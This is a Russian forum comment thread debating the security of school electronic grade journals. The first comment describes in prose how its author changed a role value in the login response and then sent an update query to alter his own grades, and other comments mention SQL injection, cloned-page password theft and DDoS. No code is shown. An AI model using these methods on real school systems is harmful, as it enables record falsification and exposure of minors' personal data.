1. Вводим свой логин и пароль. (нам его выдают ежегодно в первые учебные дни) Сервер проверяет, и отсылает данные клиенту, что авторизация прошла успешно и можно заходить, а так же присылает статус твоего профиля. (Ученик, учитель, админ). В этот момент мы просто берем подменяет на другое значение этот «статус» (вроде с тройки на единичку), и все… Вуаля мы зашли в кривую версию админки. Почему кривую? Потому что вручную там ничего нельзя поменять (фиг знает почему)
2. Оттуда вытаскиваем адрес на который отправляются SQL запросы и узнаем их формат. Роемся в различных запросах, ищем название таблицы, в которой хранятся оценки, тем же путем узнаем свой ID и номера своих отметок… И все, собрав всю информацию отправляем SET-запрос на нужную таблицу, с определенными фильтрами (PERSON_ID == X && MARK_ID==Y) и с изменением значения отметки.
Я бы привел побольше фактов, более точные инструкции, но я этим занимался год назад :)merlin-vrn
28.06.2015 08:58Знаком с АВЕРСовским журналом. Ставили эту систему одной школе.
Они анонсировали журнал как работающий на линуксе, ну так и решили — поставить на линуксе, чтоб сэкономить на лицензиях. В итоге они собирали его из исходников прямо на нашем сервере. Исходники потом удалили, но при желании можно было бы восстановить.
Ну и, потом я немного смотрел на структуру самой БД (там Firebird). Работа с ним организована через IBPP, в принципе можно было обеспечить достаточный уровень безопасности хотя бы от SQL-инъекций.Mishok2000
28.06.2015 13:43Возможно на сервере моей школы стоит ЭЖ устаревшей версии, поэтому безопасность и храмает. А обновлять, я думаю, никому просто не хочется.
questor
28.06.2015 01:37+4Учитель доверяет ученику настроить компьютер… Хм, подумаешь. Всей нашей школе (Москва) заводили логины и пароли — у всех был пароль одинаковый. Более того, когда у меня не подошёл — я вызванивал два дня подряд техподдержку оказалось, что они прекрасно знали правило формирования пароля и рекомендовали «а вы ещё спереди нолик добавьте». Почему-то у меня впечатление, что у всей Москвы правило единое.
А вы говорите — учителю настроить компьютер…
merlin-vrn
28.06.2015 09:05А что мешает в школе использовать тот же Moodle?
myrrec
28.06.2015 14:25+2Так думали многие… Но, например, сейчас школы в
добровольно-принудительном порядке перегоняют на MRKO, который официально рекомендован государством.Mishok2000
28.06.2015 14:47Зная наше правительство, это не удивительно… А как он по безопасности? (Просто по внешнему виду с первого взгляда не очень)
myrrec
28.06.2015 14:51+1Если не учитывать того, что на него постоянно жалуются учителя, он, я думаю, абсолютно незащищённый. Несмотря на сертификат https(который, кстати, уже истёк), его легко положить обычным ddos-ом. Поскольку учителя не смотрят на адрес страницы, легко увести пароли с помощью клона, если имеешь доступ к компьютеру учителя. Говорю как ученик, который помогал с MRKO(нет, пароли не уводил, просто помогал).
JDima
28.06.2015 10:25+5Теперь недостаточно, уходя из кабинета, запирать дверь на ключ, оставляя позади нее всё важное. В цифровом мире физическая недоступность не является гарантией безопасности
Давайте вторую часть статьи, где описываются методики вскрытия за секунды типичного замка в учительской, исправление записей в бумажном журнале в момент, когда учителя отвлекли, подделка подписей родителей/учителей в дневнике, ведение второго дневника и т.д.merlin-vrn
28.06.2015 10:55+3зря смеётесь, меня вот печалит тот факт, что вести два электронных дневника школьники не смогут
constnw88
28.06.2015 11:01На сколько я помню, в образовательных документах используется подпись как при первичной записи оценки на листе, так и при каждом исправлении. Разве с электронной системой не должны быть проведена аналогия? Система электронной подписи для каждого действия с железным ключом решила бы ряд проблем, на мой взгляд.
PS: сложилось ощущение, что систему создавали на скорую руку с мыслями и так сойдет, все равно заплатят. Но непонятны ошибки в реализации, которые даже для меня, как продавца, написавшего пару сайтов для знакомых, являются недопустимыми.VolCh
28.06.2015 14:121. С большой вероятностью, злоумышленник, получивший физический или полноценный удалённый доступ к компьютеру пользователя, сможет отправлять от его имени запросу на создание и обновление документов на сервере, просто потому что железный ключ типа usb-токена не будет выниматься никогда
2. При закрытой разработке «на коленке» (что часто бывает при разработке по госзаказам) весьма вероятно, что не сложно будет вносить изменения не то, что обойдя систему авторизации, но даже идентификации и логирования. То есть узнать об изменениях можно будет только сравнив два снимка, а кто и когда их сделал — крайне затруднительно в принципе.
ntfs1984
28.06.2015 11:18Статья хорошая.
Только дневники уже почти не используются в цивилизованном мире, учителя все записи делают в свои журналы, а потом шлют родителям на электронку или запиской в конце недели.boblenin
28.06.2015 18:15В США не так. Бумажные отчеты в конце недели отправляются с ребенком в спец. конверте.
infotv
28.06.2015 12:25-6А вот примеры снифферов и прочего обязательно было приводить? Сейчас сотни школяров радостно жмут Ctrl-C и потирают руки в предверии нового учебного года.
myrrec
28.06.2015 14:30+2Если человек более-менее разбирается в снифферах, то данные примеры ему не нужны, а если не разбирается, то вряд ли у него получится что-то стоящее
infotv
28.06.2015 15:47Согласен. Тогда тем более публикация кода сниффера не имеет смысла. Кому нужно, тот и так найдет, а в связке электронный дневник + сниффер + Москва эта инфа очень привлекательна для школяров. Я говорю это из собственного опыта: когда-то также пришлось опубликовать в своем блоге способ доступа к электронному дневнику, при этом я сознательно исказил способ взлома. Так вот, уже почти полгода эта статейка держится в топе — школяры отчаянно пытаются исправить свои оценки.
И я был бы рад, если бы даже таким образом ребенок получил новые знания, но практика говорит, что этот способ будут использовать, чтобы меньше учиться.
myrrec
28.06.2015 15:49В целом согласен, но не надо всех под одну гребёнку.Я, например, тоже пока школьник
infotv
28.06.2015 16:29Ок, ну тогда честно скажите: вы и ваши одноклассники как будут эксплуатировать этот сниффер? Кого будет больше среди вас — исследователей (тех, кто попытается расширить свои знания в IT) или мошенников (тех, кто захотят жульничать и поправить оценки)? Только честно.
myrrec
28.06.2015 16:38+1Если честно, большинство моих одноклассников понятия не имеют, что такое сниффер и с чем его едят. А даже если узнают, то, попробовав, поймут, что ничего не получилось( потому что любой сниффер надо адаптировать для определённых условий) и уйдут.
merlin-vrn
28.06.2015 18:20-1Найдут такого умного вроде вас, который понимает в снифферах, и начнётся.
myrrec
28.06.2015 18:24Не совсем согласен. Мне, например, нет смысла исправлять оценки, ибо нормальные, да и другим бы в этом деле не помогал, потому что учиться надо нормально
merlin-vrn
28.06.2015 19:52-1Ну, я понимаю вашу позицию, но всё-таки случаи разные бывают. Представьте себе, что будет, если исправлять оценки научился некий затравленный омега, на котором весь класс ездит верхом. Или перед девушкой захочется выпендриться.
Kroid
28.06.2015 14:14+7У любых метрик есть важное свойство — люди начинают работать на увеличение этих самых метрик. Это хорошо для менеджеров по продажам, но не подходит для некоторых других областей. Вначале школьники учатся получать хорошие оценки, потом учатся сдавать егэ. Но разве в этом смысл существования школы? Высшая цель обучения — понять, как устроен окружающий мир или отдельная его составляющая, а не зубрить правила для решения уравнений. Об этом писал в свое время Фейнман, об этом есть статья «плач математика», но все как будто не замечают того, что идут прямиком в тупик.
Всем несогласным — «давай до свидания». Делать что-то по другому становится ужасно сложно, особенно если в вашем окружении нет людей, разделяющих ваши взгляды. Окружающие люди не ненавидят вас за ваше «восстание», они просто думают, мол, странный чувак, и отворачиваются. Это пугает, начинаешь чувствовать себя наряженым словно клоун.
И автоматизация в этом смысле делает наш мир только хуже. Мы уже не просто идем в тупик, но разгоняемся, всё быстрее и быстрее. Что будет лет через 50, когда не останется людей, способных думать, а не бездумно следовать правилам?Alexey2005
28.06.2015 15:05+1Окружающие просто понимают, что ваши идеи — это очередные воздушные замки. Да, было бы хорошо, если бы они чудесным образом воплотились в жизнь. Но мы-то живём не в идеальном мире фантазий, а в мире скучных чисел, где всё упирается в деньги. Поэтому любая идея, не подкреплённая экономическим расчётом, бессмысленна.
Нормальная школа, которую вы описываете — это слишком дорого.
На школах экономят нещадно, причём с каждым годом всё больше. Например, в нашей родной школе год от года растёт количество учеников в классе. Вот о каком индивидуальном подходе может идти речь, если в типичном классе порядка 30-34 человек? Это ж получается учитель за урок на каждого ученика может позволить себе выделить чуть больше минуты времени. Просто смешно…
А теперь представьте, во сколько раз больше бюджетных денег будет тратиться на школы, если численность классов хотя бы уполовинят. А если ещё в качестве учителей будут набирать не пенсионеров на полставки, которые против начальства и вякнуть боятся, т.к. всегда можно шантажировать увольнением?
Боюсь, государство просто не потянет такое образование.Kroid
28.06.2015 16:04+5Я не думаю, что мои идеи — воздушные замки. В нашем мире скучных чисел все те люди, которые работают поварами, продавцами, водителями, etc, не используют в повседневной работе ничего сложнее арифметики. Я знаю, о чем говорю, потому что сам некоторое время работал поваром. А те немногие, кто в будущем могут стать учеными — на их обучение уже нет ни сил, ни денег, потому что мы распылили силы и деньги.
Если вернуться к скучным числам — 155 из 503 Нобелевских лауреатов были учениками других Нобелевских лауреатов. И еще 60 были учениками учеников (источник — www.careerchem.com/NAMED/NobelAnecdotes1.pdf ). Почти половина. Мы можем научить студентов теории относительности, но мы не можем сделать из них Эйнштейнов. И когда нужен гений, человечество лишь может затаить дыхание и надеяться.
Если вам нужен реальный пример не про гениев, то вот он. Когда я сознательно отказался от подобных «официально-правильных» вещей, вроде подготовки к егэ и поступления в институт, а вместо этого стал самостоятельно изучать всё то, что считал полезным для себя, окружающие смотрели на меня, как на сбежавшего из сумашедшего дома. «Кто же тебя на работу возьмет, без диплома?» — был их главный аргумент. Прошло немного времени, теперь удивляются иногда — «кто же тебя на работу взял, без диплома?». И да, я понимаю, что это прокатило только потому что я программист. Хирургом или дантистом меня бы никто не пустил заниматься без диплома. И да, я не знаю многое из того, что хотел бы знать из математики или физики, сейчас уже свободного времени не так много, но надеюсь подтянуть себя. В этом и есть суть — сознательно обдумывать и принимать решения для каждой отдельно взятой ситуации, а не просто плыть как все. Жертвовать чем-то важным, чтобы получить что-то более важное.
DjOnline
28.06.2015 16:58Всего то надо сделать:
1. Работу без интернета с локальным хранением данных и синхронизацию при появлении интернета
2. Дублирование интернета, это ведь так просто, роутер который умеет два интернет канала + свисток 3G.
3. Хранение всех изменений в отдельных таблицах вида «только на чтение» без возможности update (в mysql это COMPRESSED) + dbuser должен иметь доступ к таблице изменений только для чтения, и наглядный вывод изменений, особенно без комментариев. +ежедневный бэкап таблицы в удалённую базу, перед копией — полная сверка всех оценок в локальной и удалённой копии, если они не совпадают — автоматическое восстановление данных из удалённой копии (кроме текущего дня) + алерт и разбор полётов.
4. Никакой самодеятельности от каждой школы, единое централизованное решение на всю страну, с едиными регламентами, роутерами и свистками (которые ещё и дешевле за счёт опта).infotv
28.06.2015 17:25Уже сделано. есть такой продукт 1С Хронограф + 3Т Электронный журнал (не реклама). Работал у меня полтора года в школе на 1200 учеников
1. Есть программный клиент, работающий в том числе в оффлайне (при восстановлении связи с сервером синхронизируется)
2. С учетом п. 1 не очень критично
3. Веб-доступ только к базе в режиме чтения (выгрузка в базу раз в день). Так как это решение на платформе 1С, то проблемы резервного копирования нет, все отработано
4. А вот тут нужно быть осторожным. Отданное на откуп чиновникам такие решения превращаются в нежизнеспособных монстров.
Кстати, работало это на 1С 7.7, предоставлялось (да и сейчас предоставляется, до 2019 года) бесплатно в рамках программы «Первая помощь»infotv
28.06.2015 17:33Дополнение по п 3. Из основной базы данные раз в сутки выгружаются в отдельную базу с веб-доступом. Правка этой базы со стороны пользователя исключена. Кроме того, все данные в веб-доступе обезличены (то есть нет пользователя Антон Сидоров, есть пользователь с ИД номер N)
dkukushkin
28.06.2015 18:58+3И «ученик-компьютерщик» решает встроить свой скрипт внутрь любимого браузера Ивана Ивановича.
С таким же успехом можно стащить бумажный журнал со стола учителя и наставить себе пятерок :) Кстати, вспоминаю такой случай.
В электронном хотя бы точная дата/время останется.
maybe_im_a_leo
28.06.2015 20:42Как будто бы никто не учился в школе.
Ну исправил ученик себе оценки.
Что с того?
Он же как был дураком, так и остался.
ЕГЭ не сдаст и пойдет в армию или ПТУ (если у родителей нет денег). Будет гопником и неудачником.
Родители если не могут объяснить и привить такие элементарные вещи, то можно сколько угодно дублировать контроль оценок, результат будет один
andyudol
28.06.2015 21:35+1А давайте посмотрим, а что содержится в журнале.
- Оглавление. Это просто список предметов.
- Развёрнутые страницы. Слева — таблица, записи в которой содержат фамилии учеников и даты занятий. Поля могут быть пустыми, содержать оценку или отметку об отсутствии ученика на уроке.
Справа — таблица, записи которой содержат дату урока, тему урока, домашнее задание и подпись учителя. - Общие сведениня об учащихся. ФИО ученика и его родителей, их места работы и конатктные телефоны.
- Сведения о количестве пропущенных уроков.
- Сводная ведомость учета посещаемости.
- Сводная ведомость учета успеваемости.
- Сведения о занятиях в факультативах, кружках, секциях.
- Страница «Листок здоровья».
Из всего этго учителям и классным руководителям нужны списки учеников, листок здоровья и контактные телефоны родителей. Классным руководителям нужны сведения о дополнительных занятия. Всё!
sashabeep
28.06.2015 21:39+1Юзфул. Отлично! В свое время на олимпиадах такой метод вполне работал — входные данные и ответ были заранее известны :)
Ivan_83
29.06.2015 04:36Я как знал, говорил своей: «Они поди данные в браузере проверяют, и править там можно что угодно, не смотря на все эти запреты редактирования.», надеялся что там не настолько дураки, а тут прямо виндовс 98 — делай что хочешь.
cyberpunkyc
29.06.2015 17:15+1Когда я был в 9 классе у нас ввели такой электронный дневник. Нужно отметить, что данный порта был не только у нашей школы, а еще минимум у пары десятков школ в МСК. Любой ученик мог зайти и посмотреть свои оценки, долги и домашние задания. Все бы замечательно, если бы это был не какой-то жуткий самопис с кучей багов. За пять минут находилась первая SQL-injection (я просто кавычку искал) с восхитительными правами, которая позволяла слить всю БД и изменить себе и другим ученикам оценки. Так что дневник на DLE, а не на кривом самописе — уже прогресс.
juryev
30.06.2015 11:14+1Проблема ЭЖ имеет много сторон.
Одна сторона, как правильно отметили, — это собирание персональных данных, включая врачебную тайну, на несовершеннолетних и их родителей. Уже по одной этой причине вопросы безопасности должны стоять на первом месте. Представьте себе, что БД с болезнями всех учеников окажутся в открытом доступе. Кстати, это — один из важнейших аргументов против внедрения системы ЭЖ. Мне представляется, что ЭЖ сам по себе допустим, но только при условии, что вся БД хранится в самой школе, а не централизованно, а доступ к ней, за небольшими исключениями (домашние задания, просмотр оценок) возможен только из локальной сети школы. К сожалению, внедрение ЭЖ осуществляется без предварительной оценки рисков, как можно судить исходя из этой статьи.
Другая проблема — глобальна и взаимосвязана с общей реформой нашего образования. К сожалению, оно всё больше и больше формализуется, из-за чего учитель вынужден заниматься не столько обучением, сколько заполнением разного рода документов (электронных и бумажных). Избыточность сведений никто не оценивает, а вот здесь-то стоило бы «резать» безо всякой жалости любые дополнительные поля/галочки/кнопочки. А то ведь у нас даже существует такое направление «повышения квалификации», где сидят со всякими документами и обсуждают, где надо поставить галочку, что надо вписать в такой-то строке. Думаю, неприятие ЭЖ со стороны учителей связано именно с этим.
Что же касается возможности доступа со стороны учеников в БД, то это — совершенно не существенная проблема. Если ученик — хакер и смог написать скрипт, взломать этот журнал, ну, поставьте ему пятёрку за это, только объясните, что если он сделает то же самое в совершеннолетнем возрасте, может возникнуть уголовное дело и ст. 272 УК РФ — неправомерный доступ к компьютерной информации.
il--ya
30.06.2015 12:37-1«проблема является ключевой… со стороны пользователей»
" к подделке оригинальной информации, ее компроментации"
«примеры неаккуратности человеческого фактора»
«усугубляет и без того ненадежные системы»
Всё, дальше я не смог это читать… Автор, зачем, ну ЗАЧЕМ вы пытаетесь писать таким кондовым псевдо-научно-формальным языком? Во-первых, получается из рук вон плохо, а во-вторых, даже если бы получалось — читать это тяжело. Поменьше канцелярита, побольше сути, будьте проще, и люди к вам потянутся.il--ya
30.06.2015 12:44"Канцелярит — это мертвечина. Он проникает и в художественную литературу, и в быт, в устную речь. Даже в детскую. Из официальных материалов, из газет, от радио и телевидения канцелярский язык переходит в повседневную практику. Много лет так читали лекции, так писали учебники и даже буквари. Вскормленные языковой лебедой и мякиной, учителя в свой черёд питают той же сухомяткой чёрствых и мёртвых словес всё новые поколения ни в чём не повинных ребятишек." Нора Галь. Слово живое и мёртвое
Почитайте на досуге, школяры, чем минусовать. Не сниффером единым жив человек.
Kroid
30.06.2015 23:08Осмелюсь добавить: есть хорошая статья Джорджа Оруэлла на эту тему, называется «Политика и английский язык».
il--ya
01.07.2015 15:44Спасибо, очень интересно. Странно, но я не замечал в современной британской речи таких уродств, которые Оруэл приводит в качестве примеров. Наоборот, всегда поражался, насколько ясно и доходчиво в большинстве своём люди формулируют свои мысли. Видимо, за 70 лет им удалось остановить и развернуть вспять разрушение языка.
kovalexius
01.07.2015 13:18Как можно встроить скрипт внутрь браузера стандартными средствами браузера?
ЗЫ:
Теперь школота, прочитав статью, будет пытаться активно хакать Электронные журналы.)
Будет стимул изучать программирование и IT технологии, что в принципе неплохо.
Delphinum
Все ждал, когда же прочитаю — этим «учеником-компьютерщиком» в нашей местной школе был я! *смех безумного ученого*
Понимаете какое дело, компьютерные системы, особенно для гос. учреждений, часто пишутся на авось. Клиенту понравилось, система работает, кнопочки нажимаются — значит все хорошо. Все эти исследования и предложения приведут к одному и тому же ответу — и так все работает, на модернизацию денег нет.
Мое личное мнение — в гос. учреждениях должны применяться только бесплатное, свободное ПО, которое разрабатывается и поддерживается энтузиастами и всячески спонсируется государством.
JSmitty
Поддержу за СПО, и не соглашусь по электронному дневнику. Вы представляете, насколько квалифицированно должно быть организовано IT в школе, чтобы электронным документам можно было доверять (с соответствующими фин.гарантиями)? Скажу сразу — для минимум сельской школы на 250 учеников — это нереально. Как и для очень многих (если не большинства) городских.
Delphinum
Таки я не предлагаю доверять каким либо электронным документам, где вы это вычитали из моего коммента? )
Почему я за СПО? Именно потому, что СПО чаще всего преследует благие цели, а именно автоматизация и/или упрощение некоторой деятельности. Когда группа энтузиастов будет бесплатно писать электронный дневник, их не будет поджимать контракт с государством, обещанный гонорар или удар по шапке от начальства. Люди просто будут интересоваться у преподавателей и родителей, что им нужно, и именно это будут реализовывать. Незачем будет заставлять школы переходить на это СПО, не нужно будет «доверять» электронным документам и т.д. Все делается с целью упростить и/или автоматизировать работу, а не распилить бюджет или создать новую мега-программу. Я не настаиваю на полном переходе на электронные дневники, совсем наоборот, я предлагаю создавать и внедрять программы, которые будут помогать учителям и родителям.
demimurych
Полагаю что, разработка и сопровождение инструментов подобных журналу должно вестись на уровне министерства образования. То есть сервис журналов должен быть один на всю страну, а каждой школе предоставляться удаленный доступ. Если допустить, что министерство образования готова выделить нормальный бюджет на разработку и сопровождение подобного сервиса, возможность злоупотреблений можно свести к минимуму.
Впрочем, наверное, я наивен.
Delphinum
А внедряться он должен по приказу минобразования и доступ к исходникам должен быть только у министра обороны? Зачем все это? Чем плоха конкуренция и минимальный (никакой) бюджет?
demimurych
Если смотреть на проблему в идеальных условиях, (то есть бюджеты не пилятся, зарплаты достойные, интернеты не падают), существование единого интерфейса к подобным вещам, несравнимо практичнее местных реализаций. Набрать один отдел квалифицированных IT специалистов отслеживающих работу такого продукта гораздо проще, чем в каждой школе или районе иметь свой отдел и свой продукт.
Кроме того обратите внимание на другие возможности такого централизованного сервиса как например ученик сменил школу, или поступление в любой вуз. При санкционировании доступа к данным ученика, приемная комиссия может легко отследить динамику успеваемости.
Единый подобный сервис гораздо проще сделать таким, что его данные будут приравнены к официальным документам.
Конечно, это все в идеальных условиях, до которых нашей стране еще очень далеко.
Sarge
Сами собой напрашиваются Госуслуги… причём в перспективе уже с момента рождения, вот что интересно.
Delphinum
Можно меня поместить в ваши идеальные условия, я хочу там жить? )